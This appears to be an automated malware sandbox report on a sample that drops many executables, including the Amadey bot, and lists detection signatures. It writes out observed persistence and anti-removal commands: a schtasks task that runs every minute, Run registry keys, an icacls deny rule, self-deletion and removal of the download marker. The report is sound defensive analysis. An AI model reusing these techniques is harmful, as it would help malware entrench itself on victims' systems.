Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\325D.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: E640.exe, E640.exe, 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 617B.exe, 00000007.00000002.636451401.0000000004140000.00000040.00001000.00020000.00000000.sdmp, 617B.exe, 00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 00000009.00000002.640576372.00000000040F0000.00000040.00001000.00020000.00000000.sdmp, 5274.exe, 0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C474.exe, 0000000D.00000002.666710830.0000000004120000.00000040.00001000.00020000.00000000.sdmp, 5274.exe, 0000000E.00000002.697156815.0000000004180000.00000040.00001000.00020000.00000000.sdmp, C474.exe, 00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 00000014.00000002.669374057.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, 5274.exe, 00000016.00000002.672588515.0000000004050000.00000040.00001000.00020000.00000000.sdmp, 5274.exe, 00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 0000002C.00000002.693972740.00000000041B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000003.00000000.567880671.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000003.00000000.567880671.00007FF883751000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: oldplayer.exe, 0000001B.00000000.670618499.0000000000987000.00000002.00000001.01000000.00000014.sdmp, oldplayer.exe, 0000001B.00000002.675956030.0000000000987000.00000002.00000001.01000000.00000014.sdmp, oldplayer.exe, 0000001B.00000003.672735631.00000000059B1000.00000004.00000020.00020000.00000000.sdmp, oneetx.exe, 0000001D.00000002.801834111.00000000009D7000.00000002.00000001.01000000.00000018.sdmp, oneetx.exe, 0000001D.00000000.674703911.00000000009D7000.00000002.00000001.01000000.00000018.sdmp, oneetx.exe, 00000025.00000002.680260947.00000000009D7000.00000002.00000001.01000000.00000018.sdmp, oneetx.exe, 00000025.00000000.678502998.00000000009D7000.00000002.00000001.01000000.00000018.sdmp, oneetx.exe.27.dr
Source:	Binary string: wksprt.pdbH source: aafg31.exe, 0000001A.00000000.669397929.00007FF6D4561000.00000020.00000001.01000000.00000013.sdmp, aafg31.exe, 0000001A.00000002.878965098.00007FF6D4561000.00000020.00000001.01000000.00000013.sdmp, aafg31.exe.23.dr
Source:	Binary string: _.pdb source: 325D.exe, 00000011.00000003.658454549.00000000025D0000.00000004.00000020.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.859320186.0000000004131000.00000004.00000020.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.877619417.0000000004320000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wksprt.pdb source: aafg31.exe, 0000001A.00000000.669397929.00007FF6D4561000.00000020.00000001.01000000.00000013.sdmp, aafg31.exe, 0000001A.00000002.878965098.00007FF6D4561000.00000020.00000001.01000000.00000013.sdmp, aafg31.exe.23.dr
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: E640.exe, 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, E640.exe, 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 617B.exe, 00000007.00000002.636451401.0000000004140000.00000040.00001000.00020000.00000000.sdmp, 617B.exe, 00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 00000009.00000002.640576372.00000000040F0000.00000040.00001000.00020000.00000000.sdmp, 5274.exe, 0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C474.exe, 0000000D.00000002.666710830.0000000004120000.00000040.00001000.00020000.00000000.sdmp, 5274.exe, 0000000E.00000002.697156815.0000000004180000.00000040.00001000.00020000.00000000.sdmp, C474.exe, 00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 00000014.00000002.669374057.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, 5274.exe, 00000016.00000002.672588515.0000000004050000.00000040.00001000.00020000.00000000.sdmp, 5274.exe, 00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 0000002C.00000002.693972740.00000000041B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: eex.pdb source: explorer.exe, 00000003.00000000.567880671.00007FF883751000.00000020.00000001.01000000.00000007.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\E640.exe	Unpacked PE file: 6.2.E640.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\617B.exe	Unpacked PE file: 8.2.617B.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Unpacked PE file: 10.2.5274.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Unpacked PE file: 17.2.325D.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\C474.exe	Unpacked PE file: 18.2.C474.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Unpacked PE file: 24.2.5274.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Unpacked PE file: 25.2.5274.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Unpacked PE file: 30.2.5274.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Unpacked PE file: 4.2.rfuiwjh.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Unpacked PE file: 6.2.E640.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\617B.exe	Unpacked PE file: 8.2.617B.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Unpacked PE file: 10.2.5274.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Unpacked PE file: 17.2.325D.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\C474.exe	Unpacked PE file: 18.2.C474.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\96DF.exe	Unpacked PE file: 21.2.96DF.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Unpacked PE file: 24.2.5274.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Unpacked PE file: 25.2.5274.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Unpacked PE file: 30.2.5274.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Temp\aafg31.exe

Unpacked PE file: 26.2.aafg31.exe.3100000.2.unpack

Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_03FEC0AF push ecx; retf	5_2_03FEC0B2
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_04128F05 push ecx; ret	5_2_04128F18
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_00428565 push ecx; ret	6_2_00428578

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 6_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,

6_2_00412220

Source: XandETC.exe.23.dr

Static PE information: section name: .xdata

Source: aafg31.exe.23.dr	Static PE information: real checksum: 0x3f964 should be: 0x479d3
Source: oneetx.exe.27.dr	Static PE information: real checksum: 0x0 should be: 0x401eb
Source: 4F92.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0xa4b18
Source: oldplayer.exe.23.dr	Static PE information: real checksum: 0x0 should be: 0x401eb
Source: FE5F.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x426b7e

Source: initial sample	Static PE information: section name: .text entropy: 7.99239241264407
Source: initial sample	Static PE information: section name: .text entropy: 7.99256176055326

Persistence and Installation Behavior

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000001D.00000002.802176864.0000000001526000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: oneetx.exe PID: 5148, type: MEMORYSTR

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fvuiwjh			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\rfuiwjh			Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\FE5F.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\96DF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	File created: C:\Users\user\AppData\Local\Temp\oldplayer.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C474.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fvuiwjh	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe	File created: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\E640.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B225.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5274.exe	File created: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A08E.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A8FD.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\rfuiwjh	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\617B.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\325D.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C428.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\2A49.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A41A.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\48EA.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C523.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\5274.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	File created: C:\Users\user\AppData\Local\Temp\aafg31.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	File created: C:\Users\user\AppData\Local\Temp\XandETC.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\4F92.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Source: C:\Users\user\AppData\Local\Temp\5274.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 3003
Source: unknown	Network traffic detected: HTTP traffic on port 3003 -> 49689

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\rfuiwjh:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\fvuiwjh:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 6_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

6_2_00481920

Source: C:\Users\user\AppData\Local\Temp\5274.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\617B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\617B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\617B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\617B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C474.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C474.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C474.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C474.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
